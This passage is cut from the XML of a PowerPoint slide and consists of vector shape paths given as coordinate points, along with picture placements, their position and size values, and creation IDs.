                    <a:pt x="65486" y="442131"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751839" h="551814">
                  <a:moveTo>
                    <a:pt x="79324" y="442131"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="65486" y="442131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69832" y="448597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79324" y="448597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79324" y="442131"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751839" h="551814">
                  <a:moveTo>
                    <a:pt x="737755" y="442131"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="737755" y="446905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="742222" y="448597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="737755" y="442131"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751839" h="551814">
                  <a:moveTo>
                    <a:pt x="751593" y="442131"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="737755" y="442131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="742222" y="448597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751593" y="448597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751593" y="442131"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751839" h="551814">
                  <a:moveTo>
                    <a:pt x="480235" y="8277"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="466265" y="8277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="473560" y="14206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="467161" y="14618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="516418" y="363061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="737755" y="446905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="737755" y="442131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751593" y="442131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751593" y="437363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="539664" y="357079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529548" y="357079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525151" y="351581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="528771" y="351581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="480235" y="8277"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751839" h="551814">
                  <a:moveTo>
                    <a:pt x="479064" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="454418" y="1589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="81143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53454" y="441855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65486" y="446771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65486" y="442131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79324" y="442131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79324" y="437493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75510" y="435934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66565" y="435934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62341" y="430551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65767" y="430551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15833" y="93591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9025" y="93591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14674" y="85773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53678" y="85773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455906" y="15357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455687" y="15357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="467161" y="14618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466265" y="8277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="480235" y="8277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="479064" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751839" h="551814">
                  <a:moveTo>
                    <a:pt x="62341" y="430551"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="66565" y="435934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65988" y="432042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62341" y="430551"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751839" h="551814">
                  <a:moveTo>
                    <a:pt x="65988" y="432042"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="66565" y="435934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75510" y="435934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65988" y="432042"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751839" h="551814">
                  <a:moveTo>
                    <a:pt x="65767" y="430551"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="62341" y="430551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65988" y="432042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65767" y="430551"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751839" h="551814">
                  <a:moveTo>
                    <a:pt x="525151" y="351581"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="529548" y="357079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="528976" y="353030"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525151" y="351581"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751839" h="551814">
                  <a:moveTo>
                    <a:pt x="528976" y="353030"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="529548" y="357079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="539664" y="357079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="528976" y="353030"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751839" h="551814">
                  <a:moveTo>
                    <a:pt x="528771" y="351581"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="525151" y="351581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="528976" y="353030"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="528771" y="351581"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751839" h="551814">
                  <a:moveTo>
                    <a:pt x="14674" y="85773"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9025" y="93591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15661" y="92429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14674" y="85773"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751839" h="551814">
                  <a:moveTo>
                    <a:pt x="15661" y="92429"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9025" y="93591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15833" y="93591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15661" y="92429"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751839" h="551814">
                  <a:moveTo>
                    <a:pt x="53678" y="85773"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="14674" y="85773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15661" y="92429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53678" y="85773"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751839" h="551814">
                  <a:moveTo>
                    <a:pt x="466265" y="8277"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="467103" y="14206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="467161" y="14618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="473560" y="14206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466265" y="8277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0" name="object 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0DDBDD0-40E5-1112-9F71-851CC5FA3D6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80928" y="2337247"/>
              <a:ext cx="405321" cy="337490"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="41" name="object 37">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6992B618-91B3-C497-18F7-BD814F55EDD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75484" y="2381516"/>
              <a:ext cx="230478" cy="229870"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="42" name="object 38">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{011163BA-C975-F17B-E872-F2FBF0A0B46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02776" y="3162157"/>
              <a:ext cx="434845" cy="617746"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="43" name="object 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6FCB0F7-5454-1F0A-B31B-8C24FD8279F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3726" y="3193452"/>
              <a:ext cx="363687" cy="578099"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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C70850F9-4036-E95B-AC52-332E0C9546B1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4305937" y="3153778"/>
              <a:ext cx="445770" cy="637540"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="445770" h="637539">
                  <a:moveTo>
                    <a:pt x="382169" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="66527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="609446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64471" y="637411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157343" y="620790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68858" y="620790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64004" y="620223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66515" y="619774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29828" y="603861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16951" y="603861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11839" y="596058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16951" y="596058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16951" y="82046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9924" y="82046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16951" y="73679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57992" y="73679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380631" y="17515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="378532" y="16755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428446" y="16755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="382169" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="445770" h="637539">
                  <a:moveTo>
                    <a:pt x="66515" y="619774"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="64004" y="620223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68858" y="620790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66515" y="619774"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="445770" h="637539">
                  <a:moveTo>
                    <a:pt x="428400" y="555011"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="66515" y="619774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68858" y="620790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157343" y="620790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445352" y="569245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445352" y="562127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428400" y="562127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428400" y="555011"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="445770" h="637539">
                  <a:moveTo>
                    <a:pt x="11839" y="596058"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="16951" y="603861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16951" y="598276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11839" y="596058"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="445770" h="637539">
                  <a:moveTo>
                    <a:pt x="16951" y="598276"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="16951" y="603861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29828" y="603861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16951" y="598276"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="445770" h="637539">
                  <a:moveTo>
                    <a:pt x="16951" y="596058"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="11839" y="596058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16951" y="598276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16951" y="596058"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="445770" h="637539">
                  <a:moveTo>
                    <a:pt x="435407" y="553757"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="428400" y="555011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428400" y="562127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="435407" y="553757"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="445770" h="637539">
                  <a:moveTo>
                    <a:pt x="445352" y="553757"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="435407" y="553757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428400" y="562127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445352" y="562127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445352" y="553757"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="445770" h="637539">
                  <a:moveTo>
                    <a:pt x="428400" y="34818"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="428400" y="555011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="435407" y="553757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445352" y="553757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445352" y="36849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="434010" y="36849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428400" y="34818"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="445770" h="637539">
                  <a:moveTo>
                    <a:pt x="16951" y="73679"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9924" y="82046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16951" y="80823"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16951" y="73679"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="445770" h="637539">
                  <a:moveTo>
                    <a:pt x="16951" y="80823"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9924" y="82046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16951" y="82046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16951" y="80823"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="445770" h="637539">
                  <a:moveTo>
                    <a:pt x="57992" y="73679"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="16951" y="73679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16951" y="80823"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57992" y="73679"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="445770" h="637539">
                  <a:moveTo>
                    <a:pt x="428400" y="28853"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="428400" y="34818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="434010" y="36849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428400" y="28853"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="445770" h="637539">
                  <a:moveTo>
                    <a:pt x="445352" y="28853"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="428400" y="28853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="434010" y="36849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445352" y="36849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445352" y="28853"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="445770" h="637539">
                  <a:moveTo>
                    <a:pt x="428446" y="16755"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="378532" y="16755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="382867" y="17126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380631" y="17515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428400" y="34818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428400" y="28853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445352" y="28853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445352" y="22876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428446" y="16755"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="445770" h="637539">
                  <a:moveTo>
                    <a:pt x="378532" y="16755"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="380631" y="17515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="382867" y="17126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="378532" y="16755"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="33415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CFBCC45B-4534-1956-D8AF-027DDD8A571F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5344772" y="4143437"/>
              <a:ext cx="594360" cy="214629"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="594360" h="214629">
                  <a:moveTo>
                    <a:pt x="239337" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="175996" y="1262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119573" y="7692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71914" y="18857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34867" y="34324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="76434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5414" y="100832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58642" y="147528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103015" y="168221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156934" y="186076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218680" y="200289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286533" y="210060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="354943" y="214397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418283" y="213134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="474706" y="206703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522365" y="195538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="559412" y="180071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="594283" y="137961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="588867" y="113563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="535639" y="66868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="491265" y="46175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437346" y="28321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="375600" y="14108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307747" y="4337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23933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6" name="object 42">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B279CD1-6378-3D1B-2C4C-EDB59C92C26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14501" y="4255917"/>
              <a:ext cx="239658" cy="98894"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="47" name="object 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{021B96D1-DAA7-28ED-6008-3C4BE2B526B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48268" y="3797796"/>
              <a:ext cx="184006" cy="163035"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="48" name="object 44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3C34DE2-0798-34C6-7ABA-5A8D2F315A69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80597" y="3604310"/>
              <a:ext cx="497427" cy="722629"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="49" name="object 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FD67EC2-7CD7-DA51-119C-5A463BD64898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07570" y="4061314"/>
              <a:ext cx="199531" cy="248919"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="object 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E512717-5F1A-9572-FB57-DD7B4E3EEB1E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6716649" y="2938436"/>
              <a:ext cx="701040" cy="212725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="701040" h="212725">
                  <a:moveTo>
                    <a:pt x="700913" y="133096"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="670750" y="77584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="632231" y="52590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="581253" y="31076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520192" y="14300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="451421" y="3479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="381901" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318706" y="3924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="264414" y="14554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221589" y="31127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192836" y="52959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180733" y="79311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="181825" y="84099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176390" y="82308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="111213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123482" y="151777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214096" y="136931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249402" y="159829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300380" y="181330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361442" y="198107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430212" y="208927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="499732" y="212407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562927" y="208483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="617220" y="197866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="660044" y="181279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="688797" y="159448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700913" y="133096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1" name="object 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A65DB02-ACCD-06B9-5283-AEF2A1EC2626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27493" y="2587956"/>
              <a:ext cx="183924" cy="163274"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="52" name="object 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C097A26-D32C-831B-A9DD-090CC53A8260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12080" y="2393285"/>
              <a:ext cx="653779" cy="725170"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="53" name="object 49">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85A706BF-0152-1BEB-95A9-F21AC4E89731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33486" y="3105208"/>
              <a:ext cx="1135708" cy="726494"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="54" name="object 50">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89EB2EC9-33C4-387C-656B-B3188257E114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25393" y="3098110"/>
              <a:ext cx="1151929" cy="741680"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="55" name="object 51">
              <a:extLst>
